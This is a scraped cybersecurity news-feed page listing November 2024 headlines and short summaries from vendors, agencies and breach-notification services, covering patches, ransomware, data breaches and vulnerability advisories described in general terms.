https://asec.ahnlab.com/en/84574/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransom & Dark Web Issues Week 2, November 2024
ASEC Blog publishes Ransom & Dark Web Issues Week 2, November 2024         Massive Data Breach Exploiting MOVEit Security Vulnerability: Employee Information from Amazon, McDonald's, HSBC, and More Leaked South Korean Energy Company: Data Breach Due to RA World Ransomware Attack New Ransomware Gang Kairos: Six New Victim Companies Revealed, Including Taiwanese […] 게시물 Ransom & Dark Web Issues Week 2, November 2024이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84434/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Adversarial advantage: Using nation-state threat analysis to strengthen U.S. cybersecurity
Nation-state adversaries are changing their approach, pivoting from data destruction to prioritizing stealth and espionage. According to the Microsoft 2023 Digital Defense Report, “nation-state attackers are increasing their investments and launching more sophisticated cyberattacks to evade detection and achieve strategic priorities.” These actors pose a critical threat to United States infrastructure and protected data, and […] The post Adversarial advantage: Using nation-state threat analysis to strengthen U.S. cybersecurity appeared first on Security Intelligence.
https://securityintelligence.com/articles/adversarial-advantage-using-nation-state-threat-analysis-to-strengthen-us-cybersecurity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft 365: Guide To Backup And Recovery. What's At Risk.
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in Cloud Computing Magazine Sausalito, Calif. – Nov. 13, 2024 Microsoft 365 has become the backbone of critical operations for businesses of all sizes in various industries. According to estimates, approximately 345 The post Microsoft 365: Guide To Backup And Recovery. What’s At Risk. appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/microsoft-365-guide-to-backup-and-recovery-whats-at-risk/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Helping banish malicious adverts – and drive a secure advertising ecosystem
If your brand uses digital advertising, the NCSC has new guidance to help you choose a security-minded partner.
https://www.ncsc.gov.uk/blog-post/helping-banish-malicious-adverts
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem
If you are interested in the world of digital identities, you have probably heard some of the buzzwords that have been floating around for a few years now… “verifiable credential,” “digital wallet,” “mobile driver's license” or “mDL.” These terms, among others, all reference a growing ecosystem around what we are calling “verifiable digital credentials.” But what exactly is a verifiable digital credential? Take any physical credential you use in everyday life – your driver's license, your medical insurance card, a certification or diploma – and turn it into a digital format stored on your
https://www.nist.gov/blogs/cybersecurity-insights/digital-identities-getting-know-verifiable-digital-credential-ecosystem
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

1-15 August 2024 Cyber Attacks Timeline
In the first timeline of August 2024 I collected 123 events (8.13 events/day) with a threat landscape that was one of those exceptions...
https://www.hackmageddon.com/2024/11/13/1-15-august-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Global Companies Are Unknowingly Paying North Koreans: Here's How to Catch Them
We discuss North Korea's use of IT workers to infiltrate companies, detailing detection strategies like IT asset management and IP analysis to counter this. The post Global Companies Are Unknowingly Paying North Koreans: Here's How to Catch Them appeared first on Unit 42.
https://unit42.paloaltonetworks.com/north-korean-it-workers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threats in space (or rather, on Earth): internet-exposed GNSS receivers
Internet-exposed GNSS receivers pose a significant threat to sensitive operations. Kaspersky shares statistics on internet-exposed receivers for July 2024 and advice on how to protect against GNSS attacks.
https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DemandScience by Pure Incubation - 121,796,165 breached accounts
In early 2024, a large corpus of data from DemandScience (a company owned by Pure Incubation), appeared for sale on a popular hacking forum. Later attributed to a leak from a decommissioned legacy system, the breach contained extensive data that was largely business contact information aggregated from public sources. Specifically, the data included 122M unique corporate email addresses, physical addresses, phone numbers, employers and job titles. It also included names and for many individuals, a link to their LinkedIn profile.
https://haveibeenpwned.com/PwnedWebsites#DemandScience
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Patch Tuesday - November 2024
4 zero-days. AD CS ESC15 aka EKUwu. NTLMv2 disclosure. Exchange sender spoofing. Task scheduler EoP. .NET & Kerberos critical RCEs. Welcome Server 2025.
https://blog.rapid7.com/2024/11/12/patch-tuesday-november-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Patch Tuesday, November 2024 Edition
Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software. November's patch batch includes fixes for two zero-day vulnerabilities that are already being exploited by attackers, as well as two other flaws that were publicly disclosed prior to today.
https://krebsonsecurity.com/2024/11/microsoft-patch-tuesday-november-2024-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Weekly Detection Rule (YARA and Snort) Information – Week 2, November 2024
The following is the information on Yara and Snort rules (week 2, November 2024) collected and shared by the AhnLab TIP service. 3 YARA Rules Detection name Description Source MAL_Sophos_XG_Pygmy_Goat_AES_Key Detects Pygmy Goat – a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This […] 게시물 Weekly Detection Rule (YARA and Snort) Information – Week 2, November 2024이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84346/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

LodaRAT: Established Malware, New Victim Patterns
Rapid7 has observed an ongoing malware campaign involving a new version of LodaRAT. This version possesses the ability to steal cookies and passwords from Microsoft Edge and Brave.
https://blog.rapid7.com/2024/11/12/lodarat-established-malware-new-victim-patterns/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

6 Principles of Operational Technology Cybersecurity released by joint NSA initiative
Today’s critical infrastructure organizations rely on operational technology (OT) to help control and manage the systems and processes required to keep critical services to the public running. However, due to the highly integrated nature of OT deployments, cybersecurity has become a primary concern. On October 2, 2024, the NSA (National Security Agency) released a new […] The post 6 Principles of Operational Technology Cybersecurity released by joint NSA initiative appeared first on Security Intelligence.
https://securityintelligence.com/posts/6-principles-operational-technology-cybersecurity-nsa-initiative/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

20 Best Cybersecurity Website Designs
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in CyberOptik Sausalito, Calif. – Nov. 12, 2024 The best cybersecurity websites effectively communicate trust, expertise, and cutting-edge technology through their design and functionality, making them essential components of a cybersecurity company's success, The post 20 Best Cybersecurity Website Designs appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/20-best-cybersecurity-website-designs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ModeLeak: Privilege Escalation to LLM Model Exfiltration in Vertex AI
New research reveals two vulnerabilities in Google's Vertex AI that may lead to privilege escalation or data theft through custom jobs or malicious models. The post ModeLeak: Privilege Escalation to LLM Model Exfiltration in Vertex AI appeared first on Unit 42.
https://unit42.paloaltonetworks.com/privilege-escalation-llm-model-exfil-vertex-ai/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiOS - Improper authentication in fgfmd
An improper authentication vulnerability [CWE-287] in FortiManager, FortiOS, FortiPAM, FortiPortal, FortiProxy and FortiSwitchManager fgfmd daemon may allow an unauthenticated attacker to inject (but not receive) packets in tunnels established between a FortiManager and the targeted device. Revised on 2024-11-15 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-032
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Heap buffer overflow in httpd
A heap-based buffer overflow vulnerability [CWE-122] in FortiManager and FortiAnalyzer httpd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands as a low priivileged user via specifically crafted requests. Revised on 2024-11-15 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-125
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lack of capacity to filter logs by administrator access
An Exposure of personal information to an unauthorized actor [CWE-359] in FortiManager, FortiAnalyzer & FortiAnalyzer-BigData may allow a privileged attacker with administrative read permissions to read event logs of another adom via crafted HTTP or HTTPs requests. Revised on 2024-11-14 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-267
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Online Installer DLL Hijacking
An untrusted search path vulnerability [CWE-426] in FortiClient Windows may allow an attacker to run arbitrary code via DLL hijacking and social engineering. Revised on 2024-11-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-205
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Arbitrary file read in administrative interface
An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-22] in FortiManager, FortiAnalyzer & FortiAnalyzer-BigData may allow a privileged attacker to read arbitrary files from the underlying system via crafted HTTP or HTTPs requests. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-115
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Exposure of password hashes to read-only admin
An exposure of sensitive system information to an unauthorized control sphere vulnerability [CWE-497] in FortiWeb may allow an authenticated attacker to access the encrypted passwords of other administrators via the "Log Access Event" logs page. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-180
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiClientMacOS - Missing signature verification
An improper verification of cryptographic signature vulnerability [CWE-347] in FortiClient MacOS may allow a local authenticated attacker to swap the installer with a malicious package via a race condition during the installation process. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-022
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FortiOS - SSLVPN session hijacking using SAML authentication
A session fixation vulnerability [CWE-384] in FortiOS may allow an unauthenticated attacker to hijack user session via a phishing SAML authentication link. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-475
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Insecure Direct Object Reference over API endpoints
An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiPortal administrative interface may allow an authenticated attacker to interact with ressources of other organizations via HTTP or HTTPS requests. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-448
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Named Pipes Improper Access Control
An authentication bypass using an alternate path or channel vulnerability (CWE-288) in FortiClient (Windows) may allow a low privilege attacker to execute arbitrary code with high privilege via spoofed named pipe messages. Revised on 2024-11-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-199
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Gartner report: How SBOMs improve security and compliance in the software supply chain
As software supply chain risks rise, regulatory authorities are increasingly requiring organizations to adopt software bills of materials (SBOMs) for security and compliance.
https://www.sonatype.com/blog/gartner-report-how-sboms-improve-security-and-compliance-in-the-software-supply-chain
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DoD Zero Trust Strategy proves security benchmark years ahead of schedule with Microsoft collaboration
The Navy implementation scored a 100 percent success rate, meeting DoD requirements on all 91 Target-Level activities tested.​ The post DoD Zero Trust Strategy proves security benchmark years ahead of schedule with Microsoft collaboration appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/11/dod-zero-trust-strategy-proves-security-benchmark-years-ahead-of-schedule-with-microsoft-collaboration/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransomware Works And Is Here To Stay
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in Mitnick Security Sausalito, Calif. – Nov. 11, 2024 Kevin Mitnick, the world’s most famous hacker, passed away on Jul. 16, 2023, but his namesake Blog is alive and kicking. A recent Mitnick Security post on The post Ransomware Works And Is Here To Stay appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ransomware-works-and-is-here-to-stay/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ymir: new stealthy ransomware in the wild
Kaspersky GERT experts have discovered in Colombia new Ymir ransomware, which uses RustyStealer for initial access and the qTox client for communication with its victims.
https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hot Topic - 56,904,909 breached accounts
In October 2024, retailer Hot Topic suffered a data breach that exposed 57 million unique email addresses. The impacted data also included physical addresses, phone numbers, purchases, genders, dates of birth and partial credit data containing card type, expiry and last 4 digits.
https://haveibeenpwned.com/PwnedWebsites#HotTopic
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Change of Recovery Disruption Techniques in Ransomware
Overview   Ransomware attacks are still on the rise in 2024. Threat actors continue to launch ransomware attacks because victims infected with ransomware often pay a ransom to recover their data, allowing the attackers to gain profit significantly. Threat actors maintain their anonymity by demanding ransom payments through cryptocurrency, making it difficult for law enforcement […] 게시물 Change of Recovery Disruption Techniques in Ransomware이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84415/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FBI: Spike in Hacked Police Emails, Fake Subpoenas
The Federal Bureau of Investigation (FBI) is urging police departments and governments worldwide to beef up security around their email systems, citing a recent increase in cybercriminal services that use hacked police email accounts to send unauthorized subpoenas and customer data requests to U.S.-based technology companies.
https://krebsonsecurity.com/2024/11/fbi-spike-in-hacked-police-emails-fake-subpoenas/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with data.all (Multiple CVEs)
Publication Date: 2024/11/8 4:00 PM PDT Data.all is an open source development framework to help customers build a data marketplace on AWS. We have identified the following issues within data.all version 1.0.0 through 2.6.0. On November 8, 2024, we released a fix and recommend customers upgrade to version 2.6.1 or later and ensure any forked or derivative code are patched to incorporate the new fixes. CVE-2024-52311 relates to an issue where data.all does not invalidate authentication token upon user logout. CVE-2024-52312 relates to an issue where data.all authenticated users can perform restricted operations against DataSets and Environments. CVE-2024-52313 relates to an issue where data.all authenticated users can obtain incorrect object level authorizations. CVE-2024-52314...
https://aws.amazon.com/security/security-bulletins/AWS-2024-013/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

6 Top Benefits of Managed Cloud Security
Originally published by Tamnoon.As businesses continue migrating to the cloud and expanding their cloud footprint, scaling remediation of misconfigurations and reducing cloud threat exposure becomes a continuous battle for SecOps teams. Managed cloud security services offer the much-needed solution for cloud security teams; what MDR is to SOC teams, managed cloud security services are to security engineers. In this post, we'll explore six key benefits of managed cloud security in 2024, and wh...
https://cloudsecurityalliance.org/articles/6-top-benefits-of-managed-cloud-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Metasploit Wrap-Up: 11/08/2024
This release of Metasploit Framework has added exciting new features such as new payloads that target the RISC-V architecture. Learn more!
https://blog.rapid7.com/2024/11/08/metasploit-wrap-up-11-08-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mind the Gap: How Surface Command Tackles Asset Visibility in Attack Surface Management
By establishing visibility of the attack surface and implementing management processes to prioritize, validate, and mobilize responses, security teams can reduce exposures exploited by malicious threat actors.
https://blog.rapid7.com/2024/11/08/mind-the-gap-how-surface-command-tackles-asset-visibility-in-attack-surface-management/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SpyAgent malware targets crypto wallets by stealing screenshots
A new Android malware strain known as SpyAgent is making the rounds — and stealing screenshots as it goes. Using optical character recognition (OCR) technology, the malware is after cryptocurrency recovery phrases often stored in screenshots on user devices. Here’s how to dodge the bullet. Attackers shooting their (screen) shot Attacks start — as always […] The post SpyAgent malware targets crypto wallets by stealing screenshots appeared first on Security Intelligence.
https://securityintelligence.com/articles/spyagent-malware-targets-crypto-wallets-stealing-screenshots/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

QSC: A multi-plugin framework used by CloudComputating group in cyberespionage campaigns
Kaspersky shares details on QSC modular cyberespionage framework, which appears to be linked to CloudComputating group campaigns.
https://securelist.com/cloudcomputating-qsc-framework/114438/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco URWB Access Point Command Injection Vulnerability (CVE-2024-20418)
What is the Vulnerability?A maximum severity security (CVS Score 10.0) vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points could allow an unauthenticated, remote attacker to perform command injection attacks with root privileges on the underlying operating system. This vulnerability is due to improper validation of input to the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system.The FortiGuard Threat Research Team is actively monitoring the vulnerability and will update this report with any new developments.What is the recommended Mitigation?Cisco has released security...
https://fortiguard.fortinet.com/threat-signal-report/5574
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Multiple Actively Exploited Vulnerabilities
What are the Vulnerabilities?Threat actors are exploiting multiple zero-day vulnerabilities that were recently disclosed on the Microsoft Security Updates- August 2024. The six actively exploited zero-day vulnerabilities were also added to CISA's Known Exploited Vulnerabilities catalog (KEV) after the disclosure. [August 2024 Security Updates- Release Notes- Microsoft]CVE-2024-38189: Microsoft Project Remote Code Execution VulnerabilityCVE-2024-38178: Microsoft Windows Scripting Engine Memory Corruption VulnerabilityCVE-2024-38213: Microsoft Windows SmartScreen Security Feature Bypass VulnerabilityCVE-2024-38193: Microsoft Windows Ancillary Function Driver for WinSock Privilege Escalation VulnerabilityCVE-2024-38106: Microsoft Windows Kernel Privilege Escalation VulnerabilityCVE-2024-38107:...
https://fortiguard.fortinet.com/threat-signal-report/5507
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Digital Danger: How Cyberattacks Put Patients at Risk

https://www.proofpoint.com/us/newsroom/news/digital-danger-how-cyberattacks-put-patients-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

More value, less risk: How to implement generative AI across the organization securely and responsibly
The technology landscape is undergoing a massive transformation, and AI is at the center of this change. The post More value, less risk: How to implement generative AI across the organization securely and responsibly appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/microsoft-cloud/blog/2024/11/04/more-value-less-risk-how-to-implement-generative-ai-across-the-organization-securely-and-responsibly/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Android Malware & Security Issue 1st Week of November, 2024
ASEC Blog publishes “Android Malware & Security Issue 1st Week of November, 2024” 게시물 Android Malware & Security Issue 1st Week of November, 2024이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84283/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity Growth Stock to Buy During the Latest Market Sell-Off
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in The Motley Fool Sausalito, Calif. – Nov. 7, 2024 The Motley Fool reports that Tenable (NASDAQ: TENB) generated 7.1 million in revenue during the third quarter of 2024, a 13 percent The post Cybersecurity Growth Stock to Buy During the Latest Market Sell-Off appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybersecurity-growth-stock-to-buy-during-the-latest-market-sell-off/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Exploring DORA: How to manage ICT incidents and minimize cyber threat risks
As cybersecurity breaches continue to rise globally, institutions handling sensitive information are particularly vulnerable. In 2024, the average cost of a data breach in the financial sector reached .08 million, making it the second hardest hit after healthcare, according to IBM’s 2024 Cost of a Data Breach report. This underscores the need for robust IT […] The post Exploring DORA: How to manage ICT incidents and minimize cyber threat risks appeared first on Security Intelligence.
https://securityintelligence.com/posts/exploring-dora-how-to-manage-ict-incidents/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Silent Skimmer Gets Loud (Again)
We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of Telerik UI vulnerabilities and malware like RingQ loader. The post Silent Skimmer Gets Loud (Again) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Earth 2 - 420,961 breached accounts
In October 2024, 421k unique email addresses from the virtual earth game Earth 2 were derived from embedded Gravatar images. Appearing alongside player usernames, the root cause was related to how Gravatar presents links to avatars as MD5 hashes within consuming services, a feature Earth 2 advised has now been disabled on their platform. This incident did not expose any further personal information, passwords or financial data.
https://haveibeenpwned.com/PwnedWebsites#Earth2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unlocking Engagement with Employee Feedback

https://www.hackerone.com/culture-and-talent/unlocking-engagement-employee-feedback
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Optimizing efficiency and reducing waste in open source software management
As the use of open source software (OSS) continues to grow, so do the challenges around maintaining security and efficiency in software dependency management.
https://www.sonatype.com/blog/optimizing-efficiency-and-reducing-waste-in-open-source-software-management
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How an Improper Access Control Vulnerability Led to Account Theft in One Click
Improper access control is the #3 most common security vulnerability. Learn what improper access control is, its impacts, and how to prevent it.
https://www.hackerone.com/vulnerability-management/improper-access-control-deep-dive
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

​​Zero Trust Workshop: Advance your knowledge with an online resource
​As part of Microsoft's ongoing efforts to support security modernization and the Zero Trust principles, we've launched Zero Trust Workshop, an online self-service resource. Read our latest blog post for details. ​ The post ​​Zero Trust Workshop: Advance your knowledge with an online resource appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/06/zero-trust-workshop-advance-your-knowledge-with-an-online-resource/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransom & Dark Web Issues Week 1, November 2024
ASEC Blog publishes Ransom & Dark Web Issues Week 1, November 2024           Pro-Russian hacktivist NoName05716 carried out DDoS attacks on several South Korean institutions User account information of Saudi Arabian government agencies leaked on BreachForums New Dedicated Leak Sites of the ransomware gang HellDown   게시물 Ransom & Dark Web Issues Week 1, November 2024이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84254/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Distribution of LummaC2 Infostealer Based on Legitimate Programs
LummaC2 is an Infostealer actively being distributed while being disguised as illegal software such as cracks, and its distribution and creation methods are changing continuously. It has recently been distributed by being inserted into legitimate programs, so caution is needed.   Figure 1. Malware distribution page examples   When LummaC2 is executed, sensitive information such […] 게시물 Distribution of LummaC2 Infostealer Based on Legitimate Programs이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84556/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Telegram's recent policy shift means for cyber crime
Since its launch in August 2013, Telegram has become the go-to messaging app for privacy-focused users. To start using the app, users can sign up using either their real phone number or an anonymous number purchased from the Fragment blockchain marketplace. In the case of the latter, Telegram cannot be linked to the user’s real […] The post What Telegram's recent policy shift means for cyber crime appeared first on Security Intelligence.
https://securityintelligence.com/articles/what-telegrams-recent-policy-shift-means-for-cyber-crime/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

25 Boardroom Cybersecurity Facts, Figures, Predictions, and Statistics
This week in cybersecurity from the editors at Cybercrime Magazine –Download the Report from Secureworks Sausalito, Calif. – Nov. 6, 2024 Cybersecurity Ventures predicts that the global cost of cybercrime will reach .5 trillion USD in 2024. Knowledge is the first and best defense in The post 25 Boardroom Cybersecurity Facts, Figures, Predictions, and Statistics appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/25-boardroom-cybersecurity-facts-figures-predictions-and-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Guidance for brands to help advertising partners counter malvertising
Advice to make it harder for cyber criminals to deliver malicious advertising, and reduce the risk of cyber-facilitated fraud.
https://www.ncsc.gov.uk/guidance/guidance-brands-advertising-partners-counter-malvertising
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New SteelFox Trojan mimics software activators, stealing sensitive data and mining cryptocurrency
Kaspersky experts have discovered a new SteelFox Trojan that mimics popular software like Foxit PDF Editor and JetBrains to spread a stealer-and-miner bundle.
https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Dennis Kirk - 1,356,026 breached accounts
In October 2024, almost 20GB of data containing 1.3M unique email addresses from motorcycle supplies store Dennis Kirk was circulated. Dating back to September 2021, the data also contained purchases from the online store along with customer names, phone numbers and postcodes. Dennis Kirk did not respond to multiple attempts to make contact about the breach. The data was provided to HIBP by a source who requested it be attributed to "IntelBroker, almighty444 & EnergyWeaponUser".
https://haveibeenpwned.com/PwnedWebsites#DennisKirk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Canadian Man Arrested in Snowflake Data Extortions
A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake. On October 30, Canadian authorities arrested Alexander Moucka, a.k.a. Connor Riley Moucka of Kitchener, Ontario, on a provisional arrest warrant from the United States. Bloomberg first reported Moucka's alleged ties to the Snowflake hacks on Monday. At the end of 2023, malicious hackers learned that many large companies had uploaded huge volumes of sensitive customer data to Snowflake accounts that were protected with little more than a username and password (no multi-factor authentication required). After scouring darknet markets for stolen Snowflake account credentials, the hackers began raiding the data storage repositories...
https://krebsonsecurity.com/2024/11/canadian-man-arrested-in-snowflake-data-extortions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How an Information Disclosure Vulnerability Led to Critical Data Exposure
Information disclosure is the #2 most common security vulnerability. Learn what information disclosure is, its impacts, and how to prevent it.
https://www.hackerone.com/vulnerability-management/information-disclosure-deep-dive
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Skills shortage directly tied to financial loss in data breaches
The cybersecurity skills gap continues to widen, with serious consequences for organizations worldwide. According to IBM’s 2024 Cost Of A Data Breach Report, more than half of breached organizations now face severe security staffing shortages, a whopping 26.2% increase from the previous year. And that’s expensive. This skills deficit adds an average of .76 million in […] The post Skills shortage directly tied to financial loss in data breaches appeared first on Security Intelligence.
https://securityintelligence.com/articles/skills-shortage-directly-tied-to-financial-loss-in-data-breaches/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Altenen - 1,267,701 breached accounts
In June 2022, the malicious "carding" (referring to credit card fraud) website Altenen suffered a data breach that was later redistributed as part of a larger corpus of data. The data included 1.3M unique email addresses, usernames, bcrypt password hashes and cryptocurrency wallet addresses.
https://haveibeenpwned.com/PwnedWebsites#Altenen
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Automatically Detecting DNS Hijacking in Passive DNS
Explore how we detect DNS hijacking by analyzing millions of DNS records daily, using machine learning to identify redirect attempts to malicious servers. The post Automatically Detecting DNS Hijacking in Passive DNS appeared first on Unit 42.
https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing your software supply chain with CISA's new SBOM guidance
With new and increasing cyber threats abound, navigating global software regulations and staying informed and compliant can seem like an unending task. To help mitigate risks within the software applications organizations use every day, many are increasingly looking to the strategic adoption of software bills of materials (SBOMs) as an effective way to maintain compliance and better secure their software supply chain. An SBOM lists all packages and libraries in an application, including all components' dependencies. This enhanced visibility into what's in a piece of software makes it easier to identify vulnerabilities and license issues, as well as manage risk from open source components.
https://www.sonatype.com/blog/securing-your-software-supply-chain-with-cisas-new-sbom-guidance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How a Cross-Site Scripting Vulnerability Led to Account Takeover
Cross-site scripting (XSS) is the number one most common security vulnerability. Learn what XSS is, its impacts, and how to prevent it.
https://www.hackerone.com/vulnerability-management/xss-deep-dive
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Gartner Report: How to Respond to the Threat Landscape in a Volatile, Complex and Ambiguous World
Refine your cybersecurity strategies to navigate the challenges of a VUCA (volatility, uncertainty, complexity, and ambiguity) environment.
https://www.sonatype.com/blog/gartner-report-how-to-respond-to-the-threat-landscape-in-a-volatile-complex-and-ambiguous-world
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Microsoft Defender for Office 365 innovated to address QR code phishing attacks
This blog examines the impact of QR code phishing campaigns and the innovative features of Microsoft Defender for Office 365 that help combat evolving cyberthreats. The post How Microsoft Defender for Office 365 innovated to address QR code phishing attacks appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/04/how-microsoft-defender-for-office-365-innovated-to-address-qr-code-phishing-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Reduce Risk From Developer Permissions Sprawl
Get steps to prevent risky permissions sprawl in your SDLC. 
https://www.legitsecurity.com/blog/reduce-risk-from-developer-permissions-sprawl
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Z-lib - 9,737,374 breached accounts
In June 2024, almost 10M user records from Z-lib were discovered exposed online. Now defunct, Z-lib was a malicious clone of Z-Library, a well-known shadow online platform for pirating books and academic papers. The exposed data included usernames, email addresses, countries of residence, Bitcoin and Monero cryptocurrency wallet addresses, purchases and bcrypt password hashes.
https://haveibeenpwned.com/PwnedWebsites#ZLib
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

TA Phone Home: EDR Evasion Testing Reveals Extortion Actor's Toolkit
A threat actor attempted to use an AV/EDR bypass tool in an extortion attempt. Instead, the tool provided Unit 42 insight into the threat actor. The post TA Phone Home: EDR Evasion Testing Reveals Extortion Actor's Toolkit appeared first on Unit 42.
https://unit42.paloaltonetworks.com/edr-bypass-extortion-attempt-thwarted/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Booking.com Phishers May Leave You With Reservations
A number of cybercriminal innovations are making it easier for scammers to cash in on your upcoming travel plans. This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen. We'll also explore an array of cybercrime services aimed at phishers who target hotels that rely on the world's most visited travel website.
https://krebsonsecurity.com/2024/11/booking-com-phishers-may-leave-you-with-reservations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How a Business Logic Vulnerability Led to Unlimited Discount Redemption
Learn about the impact, severity, and a real-world example of business logic vulnerabilities.
https://www.hackerone.com/vulnerability-management/stripe-business-logic-error-bug
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Enhance security with the Sonatype Lifecycle and GitLab Ultimate integration
